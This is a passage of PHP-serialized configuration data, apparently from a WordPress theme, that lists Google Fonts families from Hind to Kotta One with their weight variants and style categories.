Mincho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Hind\";a:3:{s:5:\"label\";s:4:\"Hind\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Hind Guntur\";a:3:{s:5:\"label\";s:11:\"Hind Guntur\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Hind Madurai\";a:3:{s:5:\"label\";s:12:\"Hind Madurai\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Hind Siliguri\";a:3:{s:5:\"label\";s:13:\"Hind Siliguri\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Hind Vadodara\";a:3:{s:5:\"label\";s:13:\"Hind Vadodara\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Holtwood One SC\";a:3:{s:5:\"label\";s:15:\"Holtwood One SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Homemade Apple\";a:3:{s:5:\"label\";s:14:\"Homemade Apple\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Homenaje\";a:3:{s:5:\"label\";s:8:\"Homenaje\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Hurricane\";a:3:{s:5:\"label\";s:9:\"Hurricane\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"IBM Plex Mono\";a:3:{s:5:\"label\";s:13:\"IBM Plex Mono\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:13:\"IBM Plex Sans\";a:3:{s:5:\"label\";s:13:\"IBM Plex Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"IBM Plex Sans Arabic\";a:3:{s:5:\"label\";s:20:\"IBM Plex Sans Arabic\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:23:\"IBM Plex Sans Condensed\";a:3:{s:5:\"label\";s:23:\"IBM Plex Sans Condensed\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:24:\"IBM Plex Sans Devanagari\";a:3:{s:5:\"label\";s:24:\"IBM Plex Sans Devanagari\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"IBM Plex Sans Hebrew\";a:3:{s:5:\"label\";s:20:\"IBM Plex Sans Hebrew\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"IBM Plex Sans KR\";a:3:{s:5:\"label\";s:16:\"IBM Plex Sans KR\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"IBM Plex Sans Thai\";a:3:{s:5:\"label\";s:18:\"IBM Plex Sans Thai\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:25:\"IBM Plex Sans Thai Looped\";a:3:{s:5:\"label\";s:25:\"IBM Plex Sans Thai Looped\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"IBM Plex Serif\";a:3:{s:5:\"label\";s:14:\"IBM Plex Serif\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"IM Fell DW Pica\";a:3:{s:5:\"label\";s:15:\"IM Fell DW Pica\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"IM Fell DW Pica SC\";a:3:{s:5:\"label\";s:18:\"IM Fell DW Pica SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"IM Fell Double Pica\";a:3:{s:5:\"label\";s:19:\"IM Fell Double Pica\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:22:\"IM Fell Double Pica SC\";a:3:{s:5:\"label\";s:22:\"IM Fell Double Pica SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"IM Fell English\";a:3:{s:5:\"label\";s:15:\"IM Fell English\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"IM Fell English SC\";a:3:{s:5:\"label\";s:18:\"IM Fell English SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"IM Fell French Canon\";a:3:{s:5:\"label\";s:20:\"IM Fell French Canon\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:23:\"IM Fell French Canon SC\";a:3:{s:5:\"label\";s:23:\"IM Fell French Canon SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"IM Fell Great Primer\";a:3:{s:5:\"label\";s:20:\"IM Fell Great Primer\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:23:\"IM Fell Great Primer SC\";a:3:{s:5:\"label\";s:23:\"IM Fell Great Primer SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Ibarra Real Nova\";a:3:{s:5:\"label\";s:16:\"Ibarra Real Nova\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Iceberg\";a:3:{s:5:\"label\";s:7:\"Iceberg\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Iceland\";a:3:{s:5:\"label\";s:7:\"Iceland\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Imbue\";a:3:{s:5:\"label\";s:5:\"Imbue\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Imperial Script\";a:3:{s:5:\"label\";s:15:\"Imperial Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Imprima\";a:3:{s:5:\"label\";s:7:\"Imprima\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Inconsolata\";a:3:{s:5:\"label\";s:11:\"Inconsolata\";s:8:\"variants\";a:8:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:5:\"Inder\";a:3:{s:5:\"label\";s:5:\"Inder\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Indie Flower\";a:3:{s:5:\"label\";s:12:\"Indie Flower\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Inika\";a:3:{s:5:\"label\";s:5:\"Inika\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Inknut Antiqua\";a:3:{s:5:\"label\";s:14:\"Inknut Antiqua\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Inria Sans\";a:3:{s:5:\"label\";s:10:\"Inria Sans\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Inria Serif\";a:3:{s:5:\"label\";s:11:\"Inria Serif\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Inspiration\";a:3:{s:5:\"label\";s:11:\"Inspiration\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Inter\";a:3:{s:5:\"label\";s:5:\"Inter\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Irish Grover\";a:3:{s:5:\"label\";s:12:\"Irish Grover\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Island Moments\";a:3:{s:5:\"label\";s:14:\"Island Moments\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Istok Web\";a:3:{s:5:\"label\";s:9:\"Istok Web\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Italiana\";a:3:{s:5:\"label\";s:8:\"Italiana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Italianno\";a:3:{s:5:\"label\";s:9:\"Italianno\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Itim\";a:3:{s:5:\"label\";s:4:\"Itim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:16:\"Jacques Francois\";a:3:{s:5:\"label\";s:16:\"Jacques Francois\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:23:\"Jacques Francois Shadow\";a:3:{s:5:\"label\";s:23:\"Jacques Francois Shadow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Jaldi\";a:3:{s:5:\"label\";s:5:\"Jaldi\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"JetBrains Mono\";a:3:{s:5:\"label\";s:14:\"JetBrains Mono\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:14:\"Jim Nightshade\";a:3:{s:5:\"label\";s:14:\"Jim Nightshade\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Jockey One\";a:3:{s:5:\"label\";s:10:\"Jockey One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Jolly Lodger\";a:3:{s:5:\"label\";s:12:\"Jolly Lodger\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Jomhuria\";a:3:{s:5:\"label\";s:8:\"Jomhuria\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Jomolhari\";a:3:{s:5:\"label\";s:9:\"Jomolhari\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Josefin Sans\";a:3:{s:5:\"label\";s:12:\"Josefin Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Josefin Slab\";a:3:{s:5:\"label\";s:12:\"Josefin Slab\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Jost\";a:3:{s:5:\"label\";s:4:\"Jost\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Joti One\";a:3:{s:5:\"label\";s:8:\"Joti One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:3:\"Jua\";a:3:{s:5:\"label\";s:3:\"Jua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Judson\";a:3:{s:5:\"label\";s:6:\"Judson\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Julee\";a:3:{s:5:\"label\";s:5:\"Julee\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Julius Sans One\";a:3:{s:5:\"label\";s:15:\"Julius Sans One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Junge\";a:3:{s:5:\"label\";s:5:\"Junge\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Jura\";a:3:{s:5:\"label\";s:4:\"Jura\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Just Another Hand\";a:3:{s:5:\"label\";s:17:\"Just Another Hand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:23:\"Just Me Again Down Here\";a:3:{s:5:\"label\";s:23:\"Just Me Again Down Here\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:3:\"K2D\";a:3:{s:5:\"label\";s:3:\"K2D\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Kadwa\";a:3:{s:5:\"label\";s:5:\"Kadwa\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Kaisei Decol\";a:3:{s:5:\"label\";s:12:\"Kaisei Decol\";s:8:\"variants\";a:3:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Kaisei HarunoUmi\";a:3:{s:5:\"label\";s:16:\"Kaisei HarunoUmi\";s:8:\"variants\";a:3:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Kaisei Opti\";a:3:{s:5:\"label\";s:11:\"Kaisei Opti\";s:8:\"variants\";a:3:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Kaisei Tokumin\";a:3:{s:5:\"label\";s:14:\"Kaisei Tokumin\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:3:\"800\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Kalam\";a:3:{s:5:\"label\";s:5:\"Kalam\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Kameron\";a:3:{s:5:\"label\";s:7:\"Kameron\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Kanit\";a:3:{s:5:\"label\";s:5:\"Kanit\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kantumruy\";a:3:{s:5:\"label\";s:9:\"Kantumruy\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Karantina\";a:3:{s:5:\"label\";s:9:\"Karantina\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Karla\";a:3:{s:5:\"label\";s:5:\"Karla\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Karma\";a:3:{s:5:\"label\";s:5:\"Karma\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Katibeh\";a:3:{s:5:\"label\";s:7:\"Katibeh\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Kaushan Script\";a:3:{s:5:\"label\";s:14:\"Kaushan Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Kavivanar\";a:3:{s:5:\"label\";s:9:\"Kavivanar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Kavoon\";a:3:{s:5:\"label\";s:6:\"Kavoon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Kdam Thmor\";a:3:{s:5:\"label\";s:10:\"Kdam Thmor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Keania One\";a:3:{s:5:\"label\";s:10:\"Keania One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Kelly Slab\";a:3:{s:5:\"label\";s:10:\"Kelly Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Kenia\";a:3:{s:5:\"label\";s:5:\"Kenia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Khand\";a:3:{s:5:\"label\";s:5:\"Khand\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Khmer\";a:3:{s:5:\"label\";s:5:\"Khmer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Khula\";a:3:{s:5:\"label\";s:5:\"Khula\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Kings\";a:3:{s:5:\"label\";s:5:\"Kings\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Kirang Haerang\";a:3:{s:5:\"label\";s:14:\"Kirang Haerang\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Kite One\";a:3:{s:5:\"label\";s:8:\"Kite One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kiwi Maru\";a:3:{s:5:\"label\";s:9:\"Kiwi Maru\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Klee One\";a:3:{s:5:\"label\";s:8:\"Klee One\";s:8:\"variants\";a:2:{i:0;s:3:\"600\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Knewave\";a:3:{s:5:\"label\";s:7:\"Knewave\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"KoHo\";a:3:{s:5:\"label\";s:4:\"KoHo\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kodchasan\";a:3:{s:5:\"label\";s:9:\"Kodchasan\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Koh Santepheap\";a:3:{s:5:\"label\";s:14:\"Koh Santepheap\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Kolker Brush\";a:3:{s:5:\"label\";s:12:\"Kolker Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Kosugi\";a:3:{s:5:\"label\";s:6:\"Kosugi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Kosugi Maru\";a:3:{s:5:\"label\";s:11:\"Kosugi Maru\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kotta One\";a:3:{s:5:\"label\";s:9:\"Kotta 